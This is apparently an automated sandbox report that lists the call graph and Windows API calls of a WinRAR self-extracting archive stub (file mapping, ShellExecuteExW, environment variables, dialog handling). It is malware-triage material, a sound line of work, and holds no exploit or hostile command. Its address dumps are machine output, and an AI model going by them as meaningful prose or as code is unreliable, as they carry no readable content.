25174->25181 25175 32d1ec 25182 31f937 53 API calls 25175->25182 25185 32d21c 25175->25185 25179 314a20 _swprintf 51 API calls 25176->25179 25205 32d098 _wcslen 25177->25205 25178 32d884 98 API calls 25178->25175 25179->25184 25324 31b341 25180->25324 25186 32cc47 25181->25186 25187 32d1ff SetDlgItemTextW 25182->25187 25304 32e619 25184->25304 25189 32d884 98 API calls 25185->25189 25229 32d2d4 25185->25229 25186->25180 25314 32beff 25186->25314 25194 31f937 53 API calls 25187->25194 25197 32d237 25189->25197 25190 32d387 25191 32d390 EnableWindow 25190->25191 25192 32d399 25190->25192 25191->25192 25198 32d3b6 25192->25198 25431 3112b3 GetDlgItem KiUserCallbackDispatcher 25192->25431 25193 32d0e9 25201 31f937 53 API calls 25193->25201 25200 32d213 SetDlgItemTextW 25194->25200 25195 32cc6a GetLastError 25196 32cc75 25195->25196 25330 32bc19 SetCurrentDirectoryW 25196->25330 25208 32d249 25197->25208 25228 32d26e 25197->25228 25206 32d3dd 25198->25206 25217 32d3d5 SendMessageW 25198->25217 25200->25185 25201->25126 25203 32d2c7 25210 32d884 98 API calls 25203->25210 25205->25193 25216 31f937 53 API calls 25205->25216 25206->25126 25218 31f937 53 API calls 25206->25218 25207 32cc89 25211 32cc92 GetLastError 25207->25211 25212 32cca0 25207->25212 25429 32aef5 32 API calls 25208->25429 25209 32d3ac 25432 3112b3 GetDlgItem KiUserCallbackDispatcher 25209->25432 25210->25229 25211->25212 25214 32cd17 25212->25214 25220 32ccb0 GetTickCount 25212->25220 25221 32cd26 25212->25221 25214->25221 25224 32cf52 25214->25224 25222 32d0cc 25216->25222 25217->25206 25218->25157 25219 32d262 25219->25228 25227 314a20 _swprintf 51 API calls 25220->25227 25225 32cd3f GetModuleFileNameW 25221->25225 25226 32ceed 25221->25226 25233 32cef7 25221->25233 25230 314a20 _swprintf 51 API calls 25222->25230 25223 32d365 25430 32aef5 32 API calls 25223->25430 25339 3112d1 GetDlgItem ShowWindow 25224->25339 25421 3205ed 25225->25421 25226->25136 25226->25233 25238 32cccd 25227->25238 25228->25203 25236 32d884 98 API calls 25228->25236 25229->25190 25229->25223 25239 31f937 53 API calls 25229->25239 25230->25193 25235 31f937 53 API calls 25233->25235 25242 32cf01 25235->25242 25243 32d29c 25236->25243 25237 32cf62 25340 3112d1 GetDlgItem ShowWindow 25237->25340 25331 31a8ce 25238->25331 25239->25229 25240 32d384 25240->25190 25246 314a20 _swprintf 51 API calls 25242->25246 25243->25203 25247 32d2a5 DialogBoxParamW 25243->25247 25245 314a20 _swprintf 51 API calls 25250 32cd89 CreateFileMappingW 25245->25250 25251 32cf1f 25246->25251 25247->25136 25247->25203 25248 32cf6c 25249 31f937 53 API calls 25248->25249 25254 32cf76 SetDlgItemTextW 25249->25254 25253 32cde7 GetCommandLineW 25250->25253 25287 32ce5e __InternalCxxFrameHandler 25250->25287 25261 31f937 53 API calls 25251->25261 25258 32cdf8 25253->25258 25341 3112d1 GetDlgItem ShowWindow 25254->25341 25255 32ccf3 25259 32ccfa GetLastError 25255->25259 25260 32cd05 25255->25260 25257 32ce69 ShellExecuteExW 25272 32ce84 25257->25272 25425 32c615 SHGetMalloc 25258->25425 25259->25260 25264 31a801 80 API calls 25260->25264 25267 32cf39 25261->25267 25263 32cf88 SetDlgItemTextW GetDlgItem 25265 32cfa5 GetWindowLongW SetWindowLongW 25263->25265 25266 32cfbd 25263->25266 25264->25214 25265->25266 25342 32d884 25266->25342 25268 32ce14 25426 32c615 SHGetMalloc 25268->25426 25276 32cec7 25272->25276 25277 32ce99 WaitForInputIdle 25272->25277 25273 32ce20 25427 32c615 SHGetMalloc 25273->25427 25275 32d884 98 API calls 25278 32cfd9 25275->25278 25276->25226 25284 32cedd UnmapViewOfFile CloseHandle 25276->25284 25279 32ceae 25277->25279 25368 32eba2 25278->25368 25279->25276 25283 32ceb3 Sleep 25279->25283 25280 32ce2c 25281 32069c 82 API calls 25280->25281 25285 32ce3d MapViewOfFile 25281->25285 25283->25276 25283->25279 25284->25226 25285->25287 25287->25257 25288 32d884 98 API calls 25291 32cfff 25288->25291 25289 32d028 25428 3112b3 GetDlgItem KiUserCallbackDispatcher 25289->25428 25291->25289 25293 32d884 98 API calls 25291->25293 25292->25136 25292->25158 25293->25289 25295 311358 25294->25295 25296 3112ff 25294->25296 25434 31f5e1 GetWindowLongW SetWindowLongW 25295->25434 25298 311365 25296->25298 25433 31f608 62 API calls 2 library calls 25296->25433 25298->25126 25298->25127 25298->25128 25300 311321 25300->25298 25301 311334 GetDlgItem 25300->25301 25301->25298 25302 311344 25301->25302 25302->25298 25303 31134a SetWindowTextW 25302->25303 25303->25298 25305 32c758 5 API calls 25304->25305 25306 32e625 GetDlgItem 25305->25306 25307 32e647 25306->25307 25308 32e67b SendMessageW SendMessageW 25306->25308 25311 32e652 ShowWindow SendMessageW SendMessageW 25307->25311 25309 32e6d6 SendMessageW SendMessageW SendMessageW 25308->25309 25310 32e6b7 25308->25310 25312 32e709 SendMessageW 25309->25312 25313 32e72c SendMessageW 25309->25313 25310->25309 25311->25308 25312->25313 25313->25174 25435 32c324 GetCurrentProcess OpenProcessToken 25314->25435 25316 32bf14 25317 32bfad 25316->25317 25318 32bf1c SetEntriesInAclW 25316->25318 25317->25180 25318->25317 25319 32bf60 InitializeSecurityDescriptor 25318->25319 25320 32bf9f 25319->25320 25321 32bf6f SetSecurityDescriptorDacl 25319->25321 25320->25317 25323 32bfa4 LocalFree 25320->25323 25321->25320 25322 32bf82 CreateDirectoryW 25321->25322 25322->25320 25323->25317 25327 31b34b 25324->25327 25325 31b3dc 25326 31b542 8 API calls 25325->25326 25328 31b405 25325->25328 25326->25328 25327->25325 25327->25328 25442 31b542 25327->25442 25328->25195 25328->25196 25330->25207 25332 31a8d8 25331->25332 25333 31a935 CreateFileW 25332->25333 25334 31a929 25332->25334 25333->25334 25335 31a97f 25334->25335 25336 31cf32 GetCurrentDirectoryW 25334->25336 25335->25255 25337 31a964 25336->25337 25337->25335 25338 31a968 CreateFileW 25337->25338 25338->25335 25339->25237 25340->25248 25341->25263 25343 32d88e __EH_prolog 25342->25343 25348 32cfcb 25343->25348 25463 32c504 ExpandEnvironmentStringsW 25343->25463 25347 32dbac SetWindowTextW 25353 32d8c5 _wcslen _wcsrchr 25347->25353 25348->25275 25351 33521e 22 API calls 25351->25353 25353->25347 25353->25348 25353->25351 25354 32d99a SetFileAttributesW 25353->25354 25366 32d9b4 __cftof _wcslen 25353->25366 25464 323316 CompareStringW 25353->25464 25465 32b65d GetCurrentDirectoryW 25353->25465 25467 31b9ca 6 API calls 25353->25467 25468 31b953 FindClose 25353->25468 25469 32c67e 76 API calls 2 library calls 25353->25469 25470 32c504 ExpandEnvironmentStringsW 25353->25470 25356 32da54 GetFileAttributesW 25354->25356 25354->25366 25356->25353 25358 32da66 DeleteFileW 25356->25358 25358->25353 25360 32da77 25358->25360 25359 32dd76 GetDlgItem SetWindowTextW SendMessageW 25359->25366 25361 314a20 _swprintf 51 API calls 25360->25361 25362 32da97 GetFileAttributesW 25361->25362 25362->25360 25364 32daac MoveFileW 25362->25364 25363 32ddb6 SendMessageW 25363->25353 25364->25353 25365 32dac4 MoveFileExW 25364->25365 25365->25353 25366->25353 25366->25359 25366->25363 25367 32da30 SHFileOperationW 25366->25367 25466 31cdc0 51 API calls 2 library calls 25366->25466 25367->25356 25369 32ebac __EH_prolog 25368->25369 25471 321983 25369->25471 25371 32ebdd 25475 3164ed 25371->25475 25373 32ebfb 25479 318823 25373->25479 25377 32ec4e 25497 31890a 25377->25497 25379 32cfea 25379->25288 25381 32e7f8 25380->25381 25382 32b5d6 4 API calls 25381->25382 25383 32e7fd 25382->25383 25384 32d111 25383->25384 25385 32e805 GetWindow 25383->25385 25384->25133 25384->25134 25385->25384 25388 32e825 25385->25388 25386 32e832 GetClassNameW 25995 323316 CompareStringW 25386->25995 25388->25384 25388->25386 25389 32e856 GetWindowLongW 25388->25389 25390 32e8ba GetWindow 25388->25390 25389->25390 25391 32e866 SendMessageW 25389->25391 25390->25384 25390->25388 25391->25390 25392 32e87c GetObjectW 25391->25392 25996 32b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25392->25996 25394 32e893 25997 32b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25394->25997 25998 32b81c 8 API calls 25394->25998 25397 32e8a4 SendMessageW DeleteObject 25397->25390 25398->25148 25400 32bbe1 25399->25400 25401 32bc06 25399->25401 25999 323316 CompareStringW 25400->25999 25403 32bc14 25401->25403 25404 32bc0b SHAutoComplete 25401->25404 25407 32c217 25403->25407 25404->25403 25405 32bbf4 25405->25401 25406 32bbf8 FindWindowExW 25405->25406 25406->25401 25408 32c221 __EH_prolog 25407->25408 25409 3113f8 43 API calls 25408->25409 25410 32c243 25409->25410 26000 312083 25410->26000 25413 32c26c 25416 311a7e 143 API calls 25413->25416 25414 32c25d 25415 311641 86 API calls 25414->25415 25418 32c268 25415->25418 25419 32c28b __InternalCxxFrameHandler ___std_exception_copy 25416->25419 25417 311641 86 API calls 25417->25418 25418->25175 25418->25178 25419->25417 25420->25157 25422 3205f3 25421->25422 25424 320610 25421->25424 25423 320665 82 API calls 25422->25423 25423->25424 25424->25245 25425->25268 25426->25273 25427->25280 25428->25292 25429->25219 25430->25240 25431->25209 25432->25198 25433->25300 25434->25298 25436 32c344 GetTokenInformation 25435->25436 25440 32c39b 25435->25440 25437 32c369 ___std_exception_copy 25436->25437 25438 32c35e GetLastError 25436->25438 25439 32c372 GetTokenInformation 25437->25439 25438->25437 25438->25440 25439->25440 25441 32c38c CopySid 25439->25441 25440->25316 25441->25440 25443 31b54f 25442->25443 25444 31b573 25443->25444 25445 31b566 CreateDirectoryW 25443->25445 25446 31b4c1 3 API calls 25444->25446 25445->25444 25449 31b5a6 25445->25449 25447 31b579 25446->25447 25448 31b5b9 GetLastError 25447->25448 25452 31cf32 GetCurrentDirectoryW 25447->25452 25451 31b5b5 25448->25451 25449->25451 25455 31b8e6 25449->25455 25451->25327 25453 31b58f 25452->25453 25453->25448 25454 31b593 CreateDirectoryW 25453->25454 25454->25448 25454->25449 25456 32ffd0 25455->25456 25457 31b8f3 SetFileAttributesW 25456->25457 25458 31b936 25457->25458 25459 31b909 25457->25459 25458->25451 25460 31cf32 GetCurrentDirectoryW 25459->25460 25461 31b91d 25460->25461 25461->25458 25462 31b921 SetFileAttributesW 25461->25462 25462->25458 25463->25353 25464->25353 25465->25353 25466->25366 25467->25353 25468->25353 25469->25353 25470->25353 25472 321990 _wcslen 25471->25472 25506 311895 25472->25506 25474 3219a8 25474->25371 25476 321983 _wcslen 25475->25476 25477 311895 78 API calls 25476->25477 25478 3219a8 25477->25478 25478->25373 25480 31882d __EH_prolog 25479->25480 25519 31e298 25480->25519 25482 318855 25483 32febe 27 API calls 25482->25483 25484 318899 __cftof 25483->25484 25485 32febe 27 API calls 25484->25485 25486 3188c0 25485->25486 25525 325c64 25486->25525 25489 318a38 25490 318a42 25489->25490 25493 318ab5 25490->25493 25554 31b966 25490->25554 25492 318b5c 25492->25377 25494 318b1a 25493->25494 25532 3190a2 25493->25532 25494->25492 25560 311397 74 API calls 25494->25560 25991 31a41a 25497->25991 25499 31892b 25500 31893c Concurrency::cancel_current_task 25499->25500 25501 323546 86 API calls 25499->25501 25502 312111 26 API calls 25500->25502 25501->25500 25503 318963 25502->25503 25504 31e339 86 API calls 25503->25504 25505 31896b 25504->25505 25505->25379 25508 3118a7 25506->25508 25513 3118ff 25506->25513 25507 3118d0 25509 33521e 22 API calls 25507->25509 25508->25507 25516 3176e9 76 API calls __vswprintf_c_l 25508->25516 25511 3118f0 25509->25511 25511->25513 25518 31775a 75 API calls 25511->25518 25512 3118c6 25517 31775a 75 API calls 25512->25517 25513->25474 25516->25512 25517->25507 25518->25513 25520 31e2a2 __EH_prolog 25519->25520 25521 32febe 27 API calls 25520->25521 25523 31e2e5 25521->25523 25522 32febe 27 API calls 25524 31e309 25522->25524 25523->25522 25524->25482 25526 325c6e __EH_prolog 25525->25526 25527 32febe 27 API calls 25526->25527 25528 325c8a 25527->25528 25529 3188f2 25528->25529 25531 322166 80 API calls 25528->25531 25529->25489 25531->25529 25533 3190ac __EH_prolog 25532->25533 25561 3113f8 25533->25561 25535 3190c8 25536 3190d9 25535->25536 25723 31b1d2 25535->25723 25540 319110 25536->25540 25571 311ad3 25536->25571 25539 31910c 25539->25540 25590 312032 25539->25590 25715 311641 25540->25715 25544 3191b2 25594 31924e 25544->25594 25547 319211 25547->25540 25602 314264 25547->25602 25614 3192c6 25547->25614 25552 31b966 7 API calls 25553 319139 25552->25553 25553->25544 25553->25552 25727 31d4d2 CompareStringW _wcslen 25553->25727 25555 31b97b 25554->25555 25559 31b9a9 25555->25559 25980 31ba94 25555->25980 25557 31b98b 25558 31b990 FindClose 25557->25558 25557->25559 25558->25559 25559->25490 25560->25492 25562 3113fd __EH_prolog 25561->25562 25563 31e298 27 API calls 25562->25563 25564 311437 25563->25564 25565 32febe 27 API calls 25564->25565 25568 3114ab 25564->25568 25566 311498 25565->25566 25566->25568 25569 31644d 43 API calls 25566->25569 25728 31c1f7 25568->25728 25569->25568 25570 311533 __cftof 25570->25535 25572 311add __EH_prolog 25571->25572 25584 311b30 25572->25584 25587 311c63 25572->25587 25746 3113d9 25572->25746 25574 311c9e 25749 311397 74 API calls 25574->25749 25577 314264 116 API calls 25581 311ce9 25577->25581 25578 311cab 25578->25577 25578->25587 25579 311d31 25582 311d64 25579->25582 25579->25587 25750 311397 74 API calls 25579->25750 25581->25579 25583 314264 116 API calls 25581->25583 25582->25587 25589 31b110 79 API calls 25582->25589 25583->25581 25584->25574 25584->25578 25584->25587 25585 314264 116 API calls 25586 311db5 25585->25586 25586->25585 25586->25587 25587->25539 25588 31b110 79 API calls 25588->25584 25589->25586 25592 312037 __EH_prolog 25590->25592 25591 312068 25591->25553 25592->25591 25764 311a7e 25592->25764 25887 31e395 25594->25887 25596 31925e 25891 322701 GetSystemTime SystemTimeToFileTime 25596->25891 25598 3191cc 25598->25547 25599 322eb4 25598->25599 25896 32efab 25599->25896 25603 314270 25602->25603 25604 314274 25602->25604 25603->25547 25613 31b110 79 API calls 25604->25613 25605 314286 25606 3142a1 25605->25606 25607 3142af 25605->25607 25608 3142e1 25606->25608 25904 31395a 104 API calls 3 library calls 25606->25904 25905 312eb6 116 API calls 3 library calls 25607->25905 25608->25547 25611 3142ad 25611->25608 25906 312544 74 API calls 25611->25906 25613->25605 25615 3192d0 __EH_prolog 25614->25615 25619 31930e 25615->25619 25642 31973d Concurrency::cancel_current_task 25615->25642 25925 329cad 118 API calls 25615->25925 25616 31a18d 25618 31a1c5 25616->25618 25620 31a192 25616->25620 25618->25642 25956 329cad 118 API calls 25618->25956 25619->25616 25622 31932f 25619->25622 25619->25642 25620->25642 25955 318675 168 API calls 25620->25955 25622->25642 25907 3166df 25622->25907 25625 319545 25630 319669 25625->25630 25625->25642 25928 318f6b 38 API calls 25625->25928 25627 319405 25627->25625 25926 31b5d6 57 API calls 3 library calls 25627->25926 25633 31b966 7 API calls 25630->25633 25636 3196db 25630->25636 25632 3195ac 25927 338a18 26 API calls ___std_exception_copy 25632->25927 25633->25636 25635 319935 25935 31e4a9 96 API calls 25635->25935 25913 3189c8 25636->25913 25639 31976c 25663 3197c5 25639->25663 25929 314727 27 API calls 2 library calls 25639->25929 25642->25547 25643 319990 25644 319a3a 25643->25644 25649 3199bb 25643->25649 25648 319a8c 25644->25648 25661 319a45 25644->25661 25645 3198f4 Concurrency::cancel_current_task 25645->25643 25936 31851f 50 API calls 2 library calls 25645->25936 25656 319a2c 25648->25656 25939 318db3 119 API calls 25648->25939 25653 31b4c1 3 API calls 25649->25653 25649->25656 25658 319ae8 25649->25658 25650 31a14a 25654 31a801 80 API calls 25650->25654 25651 319a8a 25652 31a801 80 API calls 25651->25652 25652->25642 25657 3199f3 25653->25657 25654->25642 25656->25651 25656->25658 25657->25656 25937 31a50a 97 API calls 25657->25937 25658->25650 25674 319b53 25658->25674 25940 31ab1c 25658->25940 25659 31bf0a 27 API calls 25662 319ba2 25659->25662 25661->25651 25938 318b7c 123 API calls 25661->25938 25667 31bf0a 27 API calls 25662->25667 25663->25642 25663->25645 25664 3198ed 25663->25664 25930 3187fb 41 API calls 25663->25930 25931 31e4a9 96 API calls 25663->25931 25932 31237a 74 API calls 25663->25932 25933 318f28 99 API calls 25663->25933 25934 31237a 74 API calls 25664->25934 25685 319bb8 25667->25685 25672 319b41 25944 317951 77 API calls 25672->25944 25674->25659 25675 319c8b 25676 319e85 25675->25676 25677 319ce7 25675->25677 25678 319e97 25676->25678 25679 319eab 25676->25679 25699 319d20 25676->25699 25680 319cff 25677->25680 25684 319da7 25677->25684 25681 31a475 138 API calls 25678->25681 25683 324586 75 API calls 25679->25683 25682 319d46 25680->25682 25689 319d0e 25680->25689 25681->25699 25682->25699 25947 31829b 112 API calls 25682->25947 25687 319ec4 25683->25687 25948 318f6b 38 API calls 25684->25948 25685->25675 25686 319c62 25685->25686 25694 31aa7a 79 API calls 25685->25694 25686->25675 25945 31ac9c 82 API calls 25686->25945 25951 32422f 138 API calls 25687->25951 25946 31237a 74 API calls 25689->25946 25692 319e76 25692->25547 25694->25686 25696 319dec 25697 319e08 25696->25697 25698 319e1f 25696->25698 25696->25699 25949 318037 85 API calls 25697->25949 25950 31a212 103 API calls __EH_prolog 25698->25950 25699->25692 25703 319fca 25699->25703 25952 31237a 74 API calls 25699->25952 25703->25650 25705 31a083 25703->25705 25713 31a0d5 25703->25713 25919 31b199 SetEndOfFile 25703->25919 25704 31b8e6 3 API calls 25708 31a130 25704->25708 25920 31b032 25705->25920 25708->25650 25953 31237a 74 API calls 25708->25953 25709 31a0ca 25710 31a880 77 API calls 25709->25710 25710->25713 25712 31a140 25954 317871 76 API calls 25712->25954 25713->25650 25713->25704 25716 311665 Concurrency::cancel_current_task 25715->25716 25717 311653 25715->25717 25719 312111 26 API calls 25716->25719 25717->25716 25970 3116b2 26 API calls 25717->25970 25720 311694 25719->25720 25971 31e339 25720->25971 25725 31b1e9 25723->25725 25724 31b1f3 25724->25536 25725->25724 25979 3177af 78 API calls 25725->25979 25727->25553 25729 31c20d __cftof 25728->25729 25734 31c0d3 25729->25734 25741 31c0b4 25734->25741 25736 31c148 25737 312111 25736->25737 25738 31212b 25737->25738 25739 31211c 25737->25739 25738->25570 25745 31136b 26 API calls Concurrency::cancel_current_task 25739->25745 25742 31c0c2 25741->25742 25743 31c0bd 25741->25743 25742->25736 25744 312111 26 API calls 25743->25744 25744->25742 25745->25738 25751 311822 25746->25751 25749->25587 25750->25582 25752 311834 25751->25752 25758 3113f2 25751->25758 25753 31185d 25752->25753 25761 3176e9 76 API calls __vswprintf_c_l 25752->25761 25754 33521e 22 API calls 25753->25754 25756 31187a 25754->25756 25756->25758 25763 31775a 75 API calls 25756->25763 25757 311853 25762 31775a 75 API calls 25757->25762 25758->25588 25761->25757 25762->25753 25763->25758 25765 311a8a 25764->25765 25766 311a8e 25764->25766 25765->25591 25768 3119c5 25766->25768 25769 3119d7 25768->25769 25770 311a14 25768->25770 25771 314264 116 API calls 25769->25771 25776 3146ce 25770->25776 25774 3119f7 25771->25774 25774->25765 25780 3146d7 25776->25780 25777 314264 116 API calls 25777->25780 25778 311a35 25778->25774 25781 311f30 25778->25781 25780->25777 25780->25778 25793 322128 25780->25793 25782 311f3a __EH_prolog 25781->25782 25801 3142f1 25782->25801 25784 311f61 25785 311fe8 25784->25785 25786 311822 78 API calls 25784->25786 25785->25774 25787 311f78 25786->25787 25829 31190b 78 API calls 25787->25829 25789 311f90 25791 311f9c _wcslen 25789->25791 25830 322ed2 MultiByteToWideChar 25789->25830 25831 31190b 78 API calls 25791->25831 25794 32212f 25793->25794 25795 32214a 25794->25795 25799 3176e4 RaiseException std::_Xinvalid_argument 25794->25799 25796 32215b SetThreadExecutionState 25795->25796 25800 3176e4 RaiseException std::_Xinvalid_argument 25795->25800 25796->25780 25799->25795 25800->25796 25802 3142fb __EH_prolog 25801->25802 25803 314311 25802->25803 25804 31432d 25802->25804 25857 311397 74 API calls 25803->25857 25806 314588 25804->25806 25809 314359 25804->25809 25869 311397 74 API calls 25806->25869 25808 31431c 25808->25784 25809->25808 25832 324586 25809->25832 25811 3143da 25813 314465 25811->25813 25828 3143d1 25811->25828 25860 31e4a9 96 API calls 25811->25860 25812 3143d6 25812->25811 25859 31252a 78 API calls 25812->25859 25842 31bf0a 25813->25842 25815 3143c6 25858 311397 74 API calls 25815->25858 25816 3143a8 25816->25811 25816->25812 25816->25815 25818 314478 25822 31450e 25818->25822 25823 3144fe 25818->25823 25861 32422f 138 API calls 25822->25861 25846 31a475 25823->25846 25826 31450c 25826->25828 25862 31237a 74 API calls 25826->25862 25863 323546 25828->25863 25829->25789 25830->25791 25831->25785 25833 32459b 25832->25833 25835 3245a5 ___std_exception_copy 25832->25835 25870 31775a 75 API calls 25833->25870 25836 32462b 25835->25836 25837 3246d5 25835->25837 25841 32464f __cftof 25835->25841 25871 3244b9 75 API calls 3 library calls 25836->25871 25872 333340 RaiseException 25837->25872 25840 324701 25841->25816 25843 31bf18 25842->25843 25845 31bf22 25842->25845 25844 32febe 27 API calls 25843->25844 25844->25845 25845->25818 25847 31a47f __EH_prolog 25846->25847 25873 318a1f 25847->25873 25850 3113d9 78 API calls 25851 31a492 25850->25851 25876 31e56c 25851->25876 25853 31a4ee 25853->25826 25855 31e56c 133 API calls 25856 31a4a5 25855->25856 25856->25853 25856->25855 25885 31e758 97 API calls __InternalCxxFrameHandler 25856->25885 25857->25808 25858->25828 25859->25811 25860->25813 25861->25826 25862->25828 25864 323550 25863->25864 25865 323569 25864->25865 25868 32357d 25864->25868 25886 32220d 86 API calls 25865->25886 25867 323570 Concurrency::cancel_current_task 25867->25868 25869->25808 25870->25835 25871->25841 25872->25840 25874 31c619 GetVersionExW 25873->25874 25875 318a24 25874->25875 25875->25850 25883 31e582 __InternalCxxFrameHandler 25876->25883 25877 31e6f2 25878 31e726 25877->25878 25879 31e523 6 API calls 25877->25879 25880 322128 SetThreadExecutionState RaiseException 25878->25880 25879->25878 25882 31e6e9 25880->25882 25881 329cad 118 API calls 25881->25883 25882->25856 25883->25877 25883->25881 25883->25882 25884 31bff5 91 API calls 25883->25884 25884->25883 25885->25856 25886->25867 25888 31e3a5 25887->25888 25890 31e3ac 25887->25890 25892 31aa7a 25888->25892 25890->25596 25891->25598 25893 31aa93 25892->25893 25895 31b110 79 API calls 25893->25895 25894 31aac5 25894->25890 25895->25894 25897 32efb8 25896->25897 25898 31f937 53 API calls 25897->25898 25899 32efdb 25898->25899 25900 314a20 _swprintf 51 API calls 25899->25900 25901 32efed 25900->25901 25902 32e619 16 API calls 25901->25902 25903 322eca 25902->25903 25903->25547 25904->25611 25905->25611 25906->25608 25908 3166ef 25907->25908 25957 3165fb 25908->25957 25910 316722 25912 31675a 25910->25912 25962 31c6af CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25910->25962 25912->25627 25914 3189dd 25913->25914 25915 318a15 25914->25915 25968 317931 74 API calls 25914->25968 25915->25635 25915->25639 25915->25642 25917 318a0d 25969 311397 74 API calls 25917->25969 25919->25705 25921 31b043 25920->25921 25923 31b052 25920->25923 25922 31b049 FlushFileBuffers 25921->25922 25921->25923 25922->25923 25924 31b0cf SetFileTime 25923->25924 25924->25709 25925->25619 25926->25632 25927->25625 25928->25630 25929->25663 25930->25663 25931->25663 25932->25663 25933->25663 25934->25645 25935->25645 25936->25643 25937->25656 25938->25651 25939->25656 25941 319b2b 25940->25941 25942 31ab25 GetFileType 25940->25942 25941->25674 25943 31237a 74 API calls 25941->25943 25942->25941 25943->25672 25944->25674 25945->25675 25946->25699 25947->25699 25948->25696 25949->25699 25950->25699 25951->25699 25952->25703 25953->25712 25954->25650 25955->25642 25956->25642 25963 3164f8 25957->25963 25959 31661c 25959->25910 25961 3164f8 2 API calls 25961->25959 25962->25910 25966 316502 25963->25966 25964 3165ea 25964->25959 25964->25961 25966->25964 25967 31c6af CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25966->25967 25967->25966 25968->25917 25969->25915 25972 31e34a Concurrency::cancel_current_task 25971->25972 25977 31bd8e 86 API calls Concurrency::cancel_current_task 25972->25977 25974 31e37c 25978 31bd8e 86 API calls Concurrency::cancel_current_task 25974->25978 25976 31e387 25977->25974 25978->25976 25979->25724 25981 31baa1 25980->25981 25982 31bb20 FindNextFileW 25981->25982 25983 31baba FindFirstFileW 25981->25983 25985 31bb02 25982->25985 25986 31bb2b GetLastError 25982->25986 25984 31bac9 25983->25984 25983->25985 25987 31cf32 GetCurrentDirectoryW 25984->25987 25985->25557 25986->25985 25988 31bad9 25987->25988 25989 31baf7 GetLastError 25988->25989 25990 31badd FindFirstFileW 25988->25990 25989->25985 25990->25985 25990->25989 25992 31a458 __cftof 25991->25992 25994 31a425 25991->25994 25992->25499 25993 31b470 3 API calls 25993->25994 25994->25992 25994->25993 25995->25388 25996->25394 25997->25394 25998->25397 25999->25405 26001 31b1d2 78 API calls 26000->26001 26002 31208f 26001->26002 26003 311ad3 116 API calls 26002->26003 26006 3120ac 26002->26006 26004 31209c 26003->26004 26004->26006 26007 311397 74 API calls 26004->26007 26006->25413 26006->25414 26007->26006 26152 32d8d8 98 API calls 4 library calls 26194 334bd0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26009 31acd4 26012 31acde 26009->26012 26010 31ae2c SetFilePointer 26011 31ae49 GetLastError 26010->26011 26014 31acf4 26010->26014 26011->26014 26012->26010 26013 31ae05 26012->26013 26012->26014 26015 31aa7a 79 API calls 26012->26015 26013->26010 26015->26013 26126 33b8c0 21 API calls 26127 339cc0 7 API calls ___scrt_uninitialize_crt 26172 33c2c0 FreeLibrary 26155 343dc0 VariantClear 26195 3403c0 51 API calls 26060 32dfcc 26061 32dfd5 GetTempPathW 26060->26061 26072 32d8d8 _wcslen _wcsrchr 26060->26072 26066 32dff5 26061->26066 26063 314a20 _swprintf 51 API calls 26063->26066 26064 32e54f 26065 31b4c1 3 API calls 26065->26066 26066->26063 26066->26065 26067 32e02c SetDlgItemTextW 26066->26067 26070 32e049 26067->26070 26067->26072 26069 32dbac SetWindowTextW 26069->26072 26070->26072 26074 32e12f EndDialog 26070->26074 26072->26064 26072->26069 26075 33521e 22 API calls 26072->26075 26077 32d99a SetFileAttributesW 26072->26077 26081 32d9b4 __cftof _wcslen 26072->26081 26091 323316 CompareStringW 26072->26091 26092 32b65d GetCurrentDirectoryW 26072->26092 26094 31b9ca 6 API calls 26072->26094 26095 31b953 FindClose 26072->26095 26096 32c67e 76 API calls 2 library calls 26072->26096 26097 32c504 ExpandEnvironmentStringsW 26072->26097 26074->26072 26075->26072 26079 32da54 GetFileAttributesW 26077->26079 26077->26081 26079->26072 26082 32da66 DeleteFileW 26079->26082 26081->26072 26083 32dd76 GetDlgItem SetWindowTextW SendMessageW 26081->26083 26087 32ddb6 SendMessageW 26081->26087 26090 32da30 SHFileOperationW 26081->26090 26093 31cdc0 51 API calls 2 library calls 26081->26093 26082->26072 26084 32da77 26082->26084 26083->26081 26085 314a20 _swprintf 51 API calls 26084->26085 26086 32da97 GetFileAttributesW 26085->26086 26086->26084 26088 32daac MoveFileW 26086->26088 26087->26072 26088->26072 26089 32dac4 MoveFileExW 26088->26089 26089->26072 26090->26079 26091->26072 26092->26072 26093->26081 26094->26072 26095->26072 26096->26072 26097->26072

                                                                                              Executed Functions

                                                                                              Function 0032F05C Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 202filesleeptimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00321B83: GetModuleHandleW.KERNEL32(kernel32), ref: 00321B9C
                                                                                                • Part of subcall function 00321B83: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00321BAE
                                                                                                • Part of subcall function 00321B83: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00321BDF
                                                                                                • Part of subcall function 0032B65D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0032B665
                                                                                                • Part of subcall function 0032BD1B: OleInitialize.OLE32(00000000), ref: 0032BD34
                                                                                                • Part of subcall function 0032BD1B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0032BD6B
                                                                                                • Part of subcall function 0032BD1B: SHGetMalloc.SHELL32(0035A460), ref: 0032BD75
                                                                                              • GetCommandLineW.KERNEL32 ref: 0032F09B
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0032F0C5
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 0032F0D6
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0032F127
                                                                                                • Part of subcall function 0032ED2E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0032ED44
                                                                                                • Part of subcall function 0032ED2E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0032ED80
                                                                                                • Part of subcall function 00320752: _wcslen.LIBCMT ref: 00320776
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0032F12E
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00370CC0,00000800), ref: 0032F148
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxname,00370CC0), ref: 0032F154
                                                                                              • GetLocalTime.KERNEL32(?), ref: 0032F15F
                                                                                              • _swprintf.LIBCMT ref: 0032F19E
